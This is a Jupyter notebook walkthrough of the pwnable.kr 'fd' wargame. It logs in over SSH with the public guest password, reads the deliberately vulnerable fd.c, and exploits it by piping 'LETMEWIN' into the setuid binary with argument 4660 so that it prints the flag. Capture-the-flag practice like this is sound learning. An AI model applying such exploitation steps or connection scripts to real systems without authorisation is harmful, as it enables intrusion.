```
Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link:
https://youtu.be/971eZhMHQQw

ssh fd@pwnable.kr -p2222 (pw:guest)
```

In [21]:
import paramiko

class SSHClient:
    def __init__(self, host, user, password, port=22):
        self.host = host
        self.user = user
        self.password = password
        self.port = port
        self.client = paramiko.SSHClient()
        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.client.connect(self.host, username=self.user, password=self.password, port=self.port)
        
    def Run(self, cmd):
        (stdin, stdout, stderr) = self.client.exec_command(cmd)
        data = stdout.read().decode()
        return data
    
    def Close(self):
        self.client.close()

In [27]:
host = "pwnable.kr"
user = "fd"
port = 2222
password = "guest"

pwnable = SSHClient(host, user, password, port)

In [28]:
cmd = "id"
result = pwnable.Run(cmd)
print(result)

uid=1002(fd) gid=1002(fd) groups=1002(fd)



In [29]:
cmd = "ls -al"
result = pwnable.Run(cmd)
print(result)

total 40
drwxr-x---   5 root   fd   4096 Oct 26  2016 .
drwxr-xr-x 114 root   root 4096 May 19 15:59 ..
d---------   2 root   root 4096 Jun 12  2014 .bash_history
-r-sr-x---   1 fd_pwn fd   7322 Jun 11  2014 fd
-rw-r--r--   1 root   root  418 Jun 11  2014 fd.c
-r--r-----   1 fd_pwn root   50 Jun 11  2014 flag
-rw-------   1 root   root  128 Oct 26  2016 .gdb_history
dr-xr-xr-x   2 root   root 4096 Dec 19  2016 .irssi
drwxr-xr-x   2 root   root 4096 Oct 23  2016 .pwntools-cache



In [32]:
cmd = "cat fd.c"
result = pwnable.Run(cmd)
print(result)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;
	int len = 0;
	len = read(fd, buf, 32);
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

}




In [46]:
fd = 0x1234
msg = "LETMEWIN"
cmd = "echo -e '{}' | ./fd {:d}".format(msg, fd)
print(cmd)
result = pwnable.Run(cmd)
print(result)

echo -e 'LETMEWIN' | ./fd 4660
mommy! I think I know what a file descriptor is!!
good job :)



In [47]:
pwnable.Close()